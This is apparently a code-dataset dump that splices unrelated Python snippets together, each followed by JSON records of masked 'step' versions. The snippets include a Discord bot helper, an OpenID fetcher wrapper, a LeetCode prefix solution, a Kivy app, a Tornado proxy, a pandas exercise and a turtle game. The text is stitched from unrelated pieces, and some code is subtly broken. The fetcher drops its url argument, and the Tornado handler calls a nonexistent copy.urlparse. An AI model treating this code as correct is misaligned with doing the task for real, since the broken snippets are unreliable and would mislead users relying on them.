                  "**For example: Arise! help roll**" \
                  "\nI'm sure Azir will be glad to help you out... I love him so much..."

        return result

    # noinspection PyMethodMayBeStatic
    def display_command(self, command):
        if command not in self.commands:
            return "That command doesn't exist :/"
        result = f"__**Command: {command[0].upper()}{command[1:]}**__\n\n"
        result += self.command_dict[command]
        return result

    # noinspection PyMethodMayBeStatic
    def init_command_info(self):
        self.command_dict["help"] = "Did somebody say recursion?"
        self.command_dict["lottery"] = "**Syntax:** Arise! lottery [seconds]\n\n" \
                                       "__**Description**__\n" \
                                       "Azir's lottery selects one lucky winner from a pool. To enter the pool, " \
                                       "react to the lottery message with ***any*** emoji. I do not discriminate. " \
                                       "The default timer is **60 seconds**. Upon request, a different number of " \
                                       "seconds may be allowed."
        self.command_dict["poll"] = "**Syntax:** Arise! poll\n\n" \
                                    "__**Description**__\n" \
                                    "You have questions and I'll help you set them up. Follow the step-by-step " \
                                    "instructions. When you have finished them all, use the polling command to " \
                                    "ask away."
        self.command_dict["polling"] = "**Syntax:** Arise! polling [poll number]\n\n" \
                                       "__**Description**__\n" \
                                       "This command allows you to use the poll you've created. If you have multiple " \
                                       "polls, you may enter a number to specify which poll. The default is the first."
        self.command_dict["prophecy"] = "Prepare yourself."
        self.command_dict["roll"] = "**Syntax:** Arise! roll [number]\n\n" \
                                    "__**Description**__\n" \
                                    "Azir needs random numbers *all* the time so he thought you may need some too. " \
                                    "This command produces a random number from 1 to the default value of **10**. " \
                                    "If you want to roll up to a different number, let me know."
        self.command_dict["team"] = "**Syntax:** Arise! team [type]\n\n" \
                                    "__**Description**__\n" \
                                    "Do you want to play a team with a theme? The Shuriman Empire has just the " \
                                    "solution for you! With 25 different groupings (wow. Wow! WOW!!), you'll be " \
                                    "having fun forever :) The default value for [type] is **0** in which you'd " \
                                    "get any random team. To select a team based on location, use **1**. To select " \
                                    "a *funner* team, use **2**."
        self.command_dict["ub"] = "**Syntax:** Arise! ub [role]\n\n" \
                                  "__**Description**__\n" \
                                  "Oh, how I love Ultimate Bravery. No one is as good at this game mode as Azir. " \
                                  "**NO ONE!**... Ahem... So basically, you are given a random champion and a build. " \
                                  "Here are the general guidelines:\n\n" \
                                  "1. Don't play this alone. Azir forbids it.\n" \
                                  "2. No rerolling if the champion or build is undesirable.\n" \
                                  "3. Okay, rerolling is allowed if the majority of the group agrees.\n" \
                                  "4. Feel free to use any rune page. Choose wisely.\n" \
                                  "5.a) Build the items in the order that they've been delivered.\n" \
                                  "5.b) The first two items are interchangeable.\n" \
                                  "6. Try your best to win. That's the whole point of this game.\n\n" \
                                  "The default value for [role] is **1**. To select a jungle-specific build, " \
                                  "use **2**. To select a support-specific build, use **3**."
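# A short usage sketch (hypothetical; in the real bot this class would be
# driven by a Discord message handler defined elsewhere in the project):
if __name__ == '__main__':
    helper = Helper()
    print(helper.display_help())           # full command listing
    print(helper.display_command('roll'))  # details for a single command
    print(helper.display_command('nope'))  # -> "That command doesn't exist :/"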
""" An wrapper around openid's fetcher to be used in django. """ from openid import fetchers class UrlfetchFetcher(fetchers.HTTPFetcher): def fetch(self, url, body=None, headers=None): return fetchers.fetch(body, headers)
normal
{ "blob_id": "14e247b7b586242bfc17507fece3c60b7b8a3025", "index": 9604, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n\n def fetch(self, url, body=None, headers=None):\n return fetchers.fetch(body, headers)\n", "step-4": "<mask token>\nfrom openid import fetchers\n\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n\n def fetch(self, url, body=None, headers=None):\n return fetchers.fetch(body, headers)\n", "step-5": "\n\"\"\"\nAn wrapper around openid's fetcher to be used in django.\n\"\"\"\n\nfrom openid import fetchers\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n def fetch(self, url, body=None, headers=None):\n return fetchers.fetch(body, headers)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#
# @lc app=leetcode id=14 lang=python3
#
# [14] Longest Common Prefix
#
# https://leetcode.com/problems/longest-common-prefix/description/
#
# algorithms
# Easy (34.95%)
# Likes: 2372
# Dislikes: 1797
# Total Accepted: 718.5K
# Total Submissions: 2M
# Testcase Example: '["flower","flow","flight"]'
#
# Write a function to find the longest common prefix string amongst an array of
# strings.
#
# If there is no common prefix, return an empty string "".
#
# Example 1:
#
#
# Input: ["flower","flow","flight"]
# Output: "fl"
#
#
# Example 2:
#
#
# Input: ["dog","racecar","car"]
# Output: ""
# Explanation: There is no common prefix among the input strings.
#
#
# Note:
#
# All given inputs are in lowercase letters a-z.
#
#

# @lc code=start
class Solution:
    def longestCommonPrefix(self, strs: [str]) -> str:
        if not strs:
            return ''
        # Start from the shortest string: the answer can be no longer.
        strs.sort(key=len)
        res = strs[0]
        # Trim one character at a time until every string starts with res.
        while res:
            if all(s.startswith(res) for s in strs[1:]):
                return res
            res = res[:-1]
        return res
# @lc code=end

if __name__ == '__main__':
    s = Solution()
    s.longestCommonPrefix(["ca", "a"])
    s.longestCommonPrefix(["dog", "racecar", "car"])
    s.longestCommonPrefix(["flower", "flow", "flight"])
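The accepted solution above shrinks the shortest string from the right; an equivalent column-wise sketch (not part of the submission) compares one character position across all strings at a time instead.

# Alternative sketch, not the submitted solution: compare character
# columns in parallel; zip stops at the shortest string, so empty input
# and length mismatches fall out naturally.
def longest_common_prefix_zip(strs: [str]) -> str:
    prefix = []
    for column in zip(*strs):
        if len(set(column)) != 1:
            break
        prefix.append(column[0])
    return ''.join(prefix)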
normal
{ "blob_id": "80be5f49a179eebc4915bf734a8e362cc2f2ef7c", "index": 3213, "step-1": "<mask token>\n", "step-2": "class Solution:\n <mask token>\n\n\n<mask token>\n", "step-3": "class Solution:\n\n def longestCommonPrefix(self, strs: [str]) ->str:\n if not strs:\n return ''\n strs.sort(key=len)\n res = strs[0]\n while len(res) > 0:\n found = False\n for s in strs[1:]:\n if res != s[:len(res)]:\n res = res[:-1]\n found = True\n break\n if found:\n continue\n return res\n return res\n\n\n<mask token>\n", "step-4": "class Solution:\n\n def longestCommonPrefix(self, strs: [str]) ->str:\n if not strs:\n return ''\n strs.sort(key=len)\n res = strs[0]\n while len(res) > 0:\n found = False\n for s in strs[1:]:\n if res != s[:len(res)]:\n res = res[:-1]\n found = True\n break\n if found:\n continue\n return res\n return res\n\n\nif __name__ == '__main__':\n s = Solution()\n s.longestCommonPrefix(['ca', 'a'])\n s.longestCommonPrefix(['dog', 'racecar', 'car'])\n s.longestCommonPrefix(['flower', 'flow', 'flight'])\n", "step-5": "#\n# @lc app=leetcode id=14 lang=python3\n#\n# [14] Longest Common Prefix\n#\n# https://leetcode.com/problems/longest-common-prefix/description/\n#\n# algorithms\n# Easy (34.95%)\n# Likes: 2372\n# Dislikes: 1797\n# Total Accepted: 718.5K\n# Total Submissions: 2M\n# Testcase Example: '[\"flower\",\"flow\",\"flight\"]'\n#\n# Write a function to find the longest common prefix string amongst an array of\n# strings.\n# \n# If there is no common prefix, return an empty string \"\".\n# \n# Example 1:\n# \n# \n# Input: [\"flower\",\"flow\",\"flight\"]\n# Output: \"fl\"\n# \n# \n# Example 2:\n# \n# \n# Input: [\"dog\",\"racecar\",\"car\"]\n# Output: \"\"\n# Explanation: There is no common prefix among the input strings.\n# \n# \n# Note:\n# \n# All given inputs are in lowercase letters a-z.\n# \n#\n\n# @lc code=start\nclass Solution:\n def longestCommonPrefix(self, strs: [str]) -> str:\n if not strs:\n return ''\n strs.sort(key=len)\n res = strs[0]\n while len(res) > 0:\n found = False\n for s in strs[1:]: \n if res != s[:len(res)]:\n res = res[:-1]\n found = True\n break\n if found:\n continue\n return res\n return res\n# @lc code=end\nif __name__ == '__main__':\n s = Solution()\n s.longestCommonPrefix([\"ca\",\"a\"])\n s.longestCommonPrefix([\"dog\",\"racecar\",\"car\"])\n s.longestCommonPrefix([\"flower\",\"flow\",\"flight\"])\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from kivy.app import App
from kivy.uix.floatlayout import FloatLayout


class LayoutWindow(FloatLayout):
    pass


class floatlayoutApp(App):
    def build(self):
        return LayoutWindow()


if __name__ == "__main__":
    display = floatlayoutApp()
    display.run()
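As written, LayoutWindow renders an empty float layout. A minimal sketch of pairing it with a KV rule is below, inlined via Builder (placed near the top of the file) so everything stays in one file; the Button and its hints are illustrative assumptions. By Kivy's naming convention the same rule could instead live in floatlayout.kv, which floatlayoutApp would load automatically.

# Illustrative KV rule for LayoutWindow; the widget choice and the
# size/pos hints are placeholders, not taken from this project.
from kivy.lang import Builder

Builder.load_string('''
<LayoutWindow>:
    Button:
        text: "centered button"
        size_hint: 0.4, 0.2
        pos_hint: {"center_x": 0.5, "center_y": 0.5}
''')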
normal
{ "blob_id": "2af8677e76b77b9bfa579012a85ea331c0c7f390", "index": 136, "step-1": "<mask token>\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\nif __name__ == '__main__':\n display = floatlayoutApp()\n display.run()\n", "step-4": "from kivy.app import App\nfrom kivy.uix.floatlayout import FloatLayout\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\nif __name__ == '__main__':\n display = floatlayoutApp()\n display.run()\n", "step-5": "from kivy.app import App\nfrom kivy.uix.floatlayout import FloatLayout\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n def build(self):\n return LayoutWindow()\n\n\nif __name__== \"__main__\":\n display = floatlayoutApp()\n display.run()", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import tornado.httpclient
import tornado.ioloop
import tornado.web
import urllib.parse


class DjangoHandler(tornado.web.RequestHandler):
    async def reroute(self):
        # Re-issue the incoming request against the Django backend on
        # port 9000 and relay the response body back to the client.
        http = tornado.httpclient.AsyncHTTPClient()

        # Build the backend URL from the incoming request's scheme and
        # path. Query-string and header forwarding are omitted here.
        url_obj = urllib.parse.urlparse(self.request.full_url())
        backend_url = f"{url_obj.scheme}://localhost:9000{url_obj.path}"

        new_request = tornado.httpclient.HTTPRequest(
            url=backend_url,
            method=self.request.method,
            body=self.request.body or None,
        )
        response = await http.fetch(new_request)
        if response.body:
            self.write(response.body)

    get = reroute
    post = reroute


application = tornado.web.Application([
    # (r'/chat', WebsocketChatHandler),
    (r'/', DjangoHandler),
])
application.listen(80)

tornado.ioloop.IOLoop.current().start()
normal
{ "blob_id": "6960fc6d949512ffc783b085041f86cb791160a3", "index": 1500, "step-1": "<mask token>\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n get = reroute\n post = reroute\n\n\n<mask token>\napplication.listen(80)\ntornado.ioloop.IOLoop.current().start()\n", "step-3": "<mask token>\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n get = reroute\n post = reroute\n\n\napplication = tornado.web.Application([('/', DjangoHandler)])\napplication.listen(80)\ntornado.ioloop.IOLoop.current().start()\n", "step-4": "import tornado\nimport copy\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n get = reroute\n post = reroute\n\n\napplication = tornado.web.Application([('/', DjangoHandler)])\napplication.listen(80)\ntornado.ioloop.IOLoop.current().start()\n", "step-5": "import tornado\nimport copy\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f\"{url_obj.scheme}://localhost:9000{url_obj.path}\"\n\n return await http.fetch(new_request)\n\n get = reroute\n post = reroute\n\n\napplication = tornado.web.Application([\n # (r'/chat', WebsocketChatHandler),\n (r'/', DjangoHandler),\n])\napplication.listen(80)\n\ntornado.ioloop.IOLoop.current().start()\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
import pandas as pd
from greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df


def get_runs_counts_by_match():
    ipl_df = read_csv_data_to_df("data/ipl_dataset.csv")
    # Count how often each runs value occurs per match: group on the
    # (match_code, runs) pair, using the venue column as a row counter.
    df1 = pd.DataFrame(ipl_df[['match_code', 'runs', 'venue']])
    df2 = df1.groupby(['match_code', 'runs'], as_index=False).count()
    # Pivot to one row per match and one column per runs value (labelled
    # under the counted 'venue' column); missing combinations become 0.
    df = df2.pivot(index='match_code', columns='runs')
    df = df.fillna(0)
    df = df.astype('int')
    return df


get_runs_counts_by_match()
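The groupby/pivot/fillna chain above is the counting idiom spelled out step by step; assuming the same ipl_df columns, pd.crosstab collapses it to one call. Note the column labels differ: crosstab yields plain runs values rather than the ('venue', runs) MultiIndex the pivot produces.

# Equivalent counting in one call, assuming the same ipl_df columns;
# missing (match_code, runs) combinations come back as 0 automatically.
def get_runs_counts_by_match_crosstab():
    ipl_df = read_csv_data_to_df('data/ipl_dataset.csv')
    return pd.crosstab(ipl_df['match_code'], ipl_df['runs'])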
normal
{ "blob_id": "4f06d87ec79c20206ff45ba72ab77844076be553", "index": 9707, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df('data/ipl_dataset.csv')\n df1 = pd.DataFrame(ipl_df[['match_code', 'runs', 'venue']])\n df2 = df1.groupby(['match_code', 'runs'], as_index=False).count()\n df = df2.pivot(index='match_code', columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df('data/ipl_dataset.csv')\n df1 = pd.DataFrame(ipl_df[['match_code', 'runs', 'venue']])\n df2 = df1.groupby(['match_code', 'runs'], as_index=False).count()\n df = df2.pivot(index='match_code', columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\n\nget_runs_counts_by_match()\n", "step-4": "import pandas as pd\nfrom greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df\n\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df('data/ipl_dataset.csv')\n df1 = pd.DataFrame(ipl_df[['match_code', 'runs', 'venue']])\n df2 = df1.groupby(['match_code', 'runs'], as_index=False).count()\n df = df2.pivot(index='match_code', columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\n\nget_runs_counts_by_match()\n", "step-5": "\nimport pandas as pd\nfrom greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df\n\ndef get_runs_counts_by_match():\n ipl_df = read_csv_data_to_df(\"data/ipl_dataset.csv\")\n df1 = pd.DataFrame(ipl_df[['match_code','runs','venue']])\n df2 = df1.groupby(['match_code','runs'], as_index=False).count()\n df = df2.pivot(index='match_code',columns='runs')\n df = df.fillna(0)\n df = df.astype('int')\n return df\n\nget_runs_counts_by_match()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import turtle import random import winsound import sys """ new_game = False def toggle_new_game(): global new_game if new_game == False: new_game = True else: new_game = False """ wn = turtle.Screen() wn.title("MaskUp") wn.bgcolor("green") wn.bgpic("retro_city_title_page.gif") wn.setup(width=800, height=600) wn.tracer(0) wn.register_shape("human.gif") def game_loop(): score = 0 lives = 3 wn.register_shape("human.gif") wn.register_shape("Evil-Virus.gif") wn.register_shape("surgical-mask.gif") # Add the player player = turtle.Turtle() player.speed(0) player.shape("human.gif") player.color("white") player.penup() player.goto(0, -250) player.direction = "stop" # Create a list of good guys good_guys = [] # Add the good_guys for _ in range(3): good_guy = turtle.Turtle() good_guy.speed(0) good_guy.shape("surgical-mask.gif") good_guy.color("blue") good_guy.penup() good_guy.goto(-100, 250) good_guy.speed = random.uniform(0.3, 2.0) good_guys.append(good_guy) # Create a list of bad guys bad_guys = [] # Add the bad_guys for _ in range(5): bad_guy = turtle.Turtle() bad_guy.speed(0) bad_guy.shape("Evil-Virus.gif") bad_guy.color("red") bad_guy.penup() bad_guy.goto(100, 250) bad_guy.speed = random.uniform(0.3, 1.0) bad_guys.append(bad_guy) # Make the pen pen = turtle.Turtle() pen.hideturtle() pen.speed(0) pen.shape("square") pen.color("white") pen.penup() pen.goto(0, 260) font = ("Courier", 24, "normal") pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font) # Make the message def show_message(score): message = turtle.Turtle() message.hideturtle() message.speed(0) message.color("yellow") message.penup() message.goto(0, 0) font = ("Calibri", 24, "bold") message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font) # Functions def go_left(): player.direction = "left" def go_right(): player.direction = "right" def stop_player(): player.direction = "stop" # Keyboard Binding wn.listen() wn.onkeypress(go_left, "Left") wn.onkeyrelease(stop_player, "Left") wn.onkeypress(go_right, "Right") wn.onkeyrelease(stop_player, "Right") while True: # Update screen wn.update() # Move the player if player.direction == "left": x = player.xcor() if x > -365: x -= 0.8 player.setx(x) if player.direction == "right": x = player.xcor() if x < 365: x += 0.8 player.setx(x) # Move the good guys for good_guy in good_guys: y = good_guy.ycor() y -= good_guy.speed good_guy.sety(y) # Check if off the screen if y < -300: x = random.randint(-380, 380) y = random.randint(300, 400) good_guy.goto(x, y) # Check for a collision with player if good_guy.distance(player) < 40: x = random.randint(-380, 380) y = random.randint(300, 400) good_guy.goto(x, y) score += 10 pen.clear() pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font) winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME) # Move the bad guys for bad_guy in bad_guys: y = bad_guy.ycor() y -= bad_guy.speed bad_guy.sety(y) # Check if off the screen if y < -300: x = random.randint(-380, 380) y = random.randint(300, 400) bad_guy.goto(x, y) # Check for a collision with player if bad_guy.distance(player) < 40: x = random.randint(-380, 380) y = random.randint(300, 400) bad_guy.goto(x, y) score -= 10 lives -= 1 pen.clear() pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font) winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME) if lives <= 0: pen.clear() bad_guy.clear() good_guy.clear() show_message(score) 
winsound.PlaySound("game_over_sound", winsound.SND_FILENAME) # wn.listen() # if wn.onkeypress(toggle_new_game, "a"): # if new_game == True: break # wn.onkeypress(sys.exit(), "q") while True: # Update screen wn.update() # Play music wn.bgpic("retro_city.gif") winsound.PlaySound("retro_video_game_music-trimmed", winsound.SND_LOOP) game_loop() turtle.Screen().clear() wn = turtle.Screen() wn.title("MaskUp") wn.bgcolor("green") wn.bgpic("retro_city_title_page.gif") wn.setup(width=800, height=600) wn.tracer(0) #sys.exit() wn.mainloop()
normal
{ "blob_id": "1593280a29b13461b13d8b2805d9ac53ce94c759", "index": 2948, "step-1": "<mask token>\n", "step-2": "<mask token>\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', 
winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n", "step-3": "<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', 
winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n", "step-4": "import turtle\nimport random\nimport winsound\nimport sys\n<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO 